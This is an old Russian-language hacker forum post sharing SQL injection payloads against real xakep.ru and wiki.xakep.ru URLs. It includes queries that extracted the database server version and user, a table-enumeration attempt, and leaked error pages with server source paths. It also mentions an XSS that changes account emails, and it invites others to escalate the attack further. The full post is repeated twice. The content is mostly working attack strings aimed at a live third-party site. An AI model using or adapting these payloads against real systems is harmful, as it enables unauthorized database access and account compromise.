halkfild
05.10.2007, 22:08
вот подборка по ресурсу ХАКЕР.ru.. мо что-то интересное получится
SQL-injection
скуля вполне рабочая вот только с таблици достать не получилось.. так версия, юзер и тд
http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast(@@VERSION+as+nv
archar))--&site=xakep
Microsoft SQL Server 2005 - 9.
http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast(system_user+as+
nvarchar))--&site=xakep
system_user
ну вот что-то посерьезнее вытянуть очень тяжело
тут еще и второй параметр уязвим))
http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast((SELECT+TOP+1+T
ABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)+as+nvarc har))--&site=xakep
http://xakep.ru/local/admin/voter.asp?action=add&filedir=38150&site=xakep'%20or%201=@@version
--
Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Server Error
http://wiki.xakep.ru/Pages.aspx?Cat=%ce%ef%e5%f0%e0%f6%e8%ee%ed%ed%fb%e 5%20%f1%e8%f1%f2%e5%ec
%fb'+and+1=1--
http://wiki.xakep.ru/Pages.aspx?Cat=%ce%ef%e5%f0%e0%f6%e8%ee%ed%ed%fb%e 5%20%f1%e8%f1%f2%e5%ec
%fb'%20and%201=1--
http://wiki.xakep.ru/Pages.aspx?Cat=%c8%ed%f2%e5%f0%ed%e5%f2%3Cb%3Eaaa% 3C/b%3E
Line 58: if (Request["Cat"] != null ? !Request["Cat"].Equals("-") : false)
Line 59: category = Request["Cat"].ToString();
Line 60: DataTable ds = Pages.Instance.DataPages((SessionFacade.Published ? 1 :
0), category);
Line 61: AllRows = ds.Rows.Count;
Line 62: DataGrid1.DataSource = ds.DefaultView;
Source File: d:\morazm\www\wiki\xakep\Pages.aspx.cs Line: 60
з.ы. когда-то мыла можно было изменять через ксс потом прикрили... теперь вот опять можна
http://wiki.xakep.ru/Profile.aspx
з.з.ы еще где то в теме с пасивками лежит пасивка на хакере /*раньше работало)*/
тут еще с типами боянчег
http://www.xakep.ru/articles/magazine/archive.asp?magazine=xa'--&year=2007
кто сможет раскрутить на что-то нормальное (:
SQL-injection
скуля вполне рабочая вот только с таблици достать не получилось.. так версия, юзер и тд
http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast(@@VERSION+as+nv
archar))--&site=xakep
Microsoft SQL Server 2005 - 9.
http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast(system_user+as+
nvarchar))--&site=xakep
system_user
ну вот что-то посерьезнее вытянуть очень тяжело
тут еще и второй параметр уязвим))
http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast((SELECT+TOP+1+T
ABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)+as+nvarc har))--&site=xakep
http://xakep.ru/local/admin/voter.asp?action=add&filedir=38150&site=xakep'%20or%201=@@version
--
Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Server Error
http://wiki.xakep.ru/Pages.aspx?Cat=%ce%ef%e5%f0%e0%f6%e8%ee%ed%ed%fb%e 5%20%f1%e8%f1%f2%e5%ec
%fb'+and+1=1--
http://wiki.xakep.ru/Pages.aspx?Cat=%ce%ef%e5%f0%e0%f6%e8%ee%ed%ed%fb%e 5%20%f1%e8%f1%f2%e5%ec
%fb'%20and%201=1--
http://wiki.xakep.ru/Pages.aspx?Cat=%c8%ed%f2%e5%f0%ed%e5%f2%3Cb%3Eaaa% 3C/b%3E
Line 58: if (Request["Cat"] != null ? !Request["Cat"].Equals("-") : false)
Line 59: category = Request["Cat"].ToString();
Line 60: DataTable ds = Pages.Instance.DataPages((SessionFacade.Published ? 1 :
0), category);
Line 61: AllRows = ds.Rows.Count;
Line 62: DataGrid1.DataSource = ds.DefaultView;
Source File: d:\morazm\www\wiki\xakep\Pages.aspx.cs Line: 60
з.ы. когда-то мыла можно было изменять через ксс потом прикрили... теперь вот опять можна
http://wiki.xakep.ru/Profile.aspx
з.з.ы еще где то в теме с пасивками лежит пасивка на хакере /*раньше работало)*/
тут еще с типами боянчег
http://www.xakep.ru/articles/magazine/archive.asp?magazine=xa'--&year=2007
кто сможет раскрутить на что-то нормальное (: